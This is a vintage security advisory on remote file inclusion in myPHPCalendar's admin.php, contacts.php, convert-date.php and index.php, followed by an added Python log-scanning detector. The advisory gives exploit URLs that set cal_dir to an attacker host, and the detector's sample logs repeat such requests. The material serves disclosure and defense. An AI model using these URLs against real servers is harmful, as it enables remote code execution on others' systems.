myPHPCalendar version 10192000 Build 1 Beta has information disclosure and file inclusion vulnerabilities that lie in the admin.php, contacts.php, and convert-date.php files.
Information :
°°°°°°°°°°°°°
Language : PHP
Version : 10192000 Build 1 Beta
Website : https://myphpcalendar.sourceforge.net/
Problems :
- Information Disclosure
- File Inclusion
PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
admin.php, contacts.php, convert-date.php :
------------------------
include ("globals.inc");
------------------------
globals.inc :
------------------------------
include($cal_dir."vars.inc");
include($cal_dir."prefs.inc");
------------------------------
index.php :
----------------------------------------
include ($cal_dir."globals.inc");
[...]
include($cal_dir."sql.inc");
----------------------------------------
setup.php :
----------------------------------------------------------------
$fp = fopen("setup.inc", "w+");
fputs($fp, "<?php\n");
fputs($fp, "\$url = \"".$URL."\";\n");
fputs($fp, "\$mainscript = \"".$MAINSCRIPT."\";\n");
fputs($fp, "\$mysql_server = \"".$MYSQL_SERVER."\";\n");
fputs($fp, "\$mysql_username = \"".$MYSQL_USERNAME."\";\n");
fputs($fp, "\$mysql_pass = \"".$MYSQL_PASS."\";\n");
fputs($fp, "\$database_name = \"".$DATABASE_NAME."\";\n");
fputs($fp, "\$db_type = \"".$DB_TYPE."\";\n");
fputs($fp, "\$user_text = \"".$USER_TEXT."\";\n");
fputs($fp, "\$crypt_type = \"".$CRYPT_TYPE."\";\n");
fputs($fp, "\$display_username = \"".$DISPLAY_USERNAME."\";\n");
fputs($fp, "\$maxdisplay = \"".$MAXDISPLAY."\";\n");
fputs($fp, "\$admin_email = \"".$ADMIN_EMAIL."\";\n");
----------------------------------------------------------------
Exploits :
°°°°°°°°
https://[target]/admin.php?cal_dir=https://[attacker]/
https://[target]/contacts.php?cal_dir=https://[attacker]/
https://[target]/convert-date.php?cal_dir=https://[attacker]/
will include the files :
https://[attacker]/vars.inc and/or https://[attacker]/prefs.inc
and https://[target]/index.php?cal_dir=https://[attacker]/ will include the
files :
https://[target]/globals.inc https://[target]/sql.inc
Patch :
°°°°°°°
A patch and more details can be found on https://www.phpsecure.info.
frog-m@n
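
Detection sketch (an added example, not part of the original advisory or of myPHPCalendar): it scans web server access logs for requests to the scripts listed above that supply cal_dir. The log format, the sample lines, and the rule that cal_dir is never a legitimate request parameter are assumptions.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Scripts the advisory lists as building an include() path from $cal_dir.
AFFECTED = {"admin.php", "contacts.php", "convert-date.php", "index.php"}
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A URL scheme or UNC prefix in cal_dir points the include at another host.
REMOTE_RE = re.compile(r"^(?:[a-z][a-z0-9+.-]*://|\\\\)", re.I)

# Constructed sample lines (documentation addresses and .example hosts).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2003:10:00:00 +0000] "GET /calendar/index.php?month=1 HTTP/1.0" 200 5120',
    '198.51.100.7 - - [01/Jan/2003:10:02:11 +0000] "GET /calendar/admin.php?cal_dir=http://attacker.example/ HTTP/1.0" 200 312',
    '198.51.100.7 - - [01/Jan/2003:10:02:15 +0000] "GET /calendar/contacts.php?cal%5Fdir=http%3A%2F%2Fattacker.example%2F HTTP/1.0" 200 298',
    '192.0.2.44 - - [01/Jan/2003:10:05:40 +0000] "GET /calendar/convert-date.php?cal_dir=../ HTTP/1.0" 200 140',
    '192.0.2.44 - - [01/Jan/2003:10:05:42 +0000] "GET /other/page.php?cal_dir=http://attacker.example/ HTTP/1.0" 404 0',
]


def classify(line):
    """Return None, 'override' or 'remote' for one access-log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    target = urlsplit(m.group(1))
    if target.path.rsplit("/", 1)[-1].lower() not in AFFECTED:
        return None
    verdict = None
    # parse_qsl percent-decodes names and values, so cal%5Fdir is caught too.
    for name, value in parse_qsl(target.query, keep_blank_values=True):
        if name != "cal_dir":
            continue
        if REMOTE_RE.match(value.strip()):
            return "remote"
        verdict = "override"  # assumption: cal_dir is never sent legitimately
    return verdict


def scan(lines):
    """Return (line_number, verdict) for every line that sets cal_dir."""
    hits = []
    for number, line in enumerate(lines, start=1):
        verdict = classify(line)
        if verdict:
            hits.append((number, verdict))
    return hits


if __name__ == "__main__":
    for number, verdict in scan(SAMPLE_LOG):
        print(f"line {number}: {verdict}")
```

A "remote" hit means the include path was pointed at another host; an "override" hit still shows a client setting a variable the application should define itself.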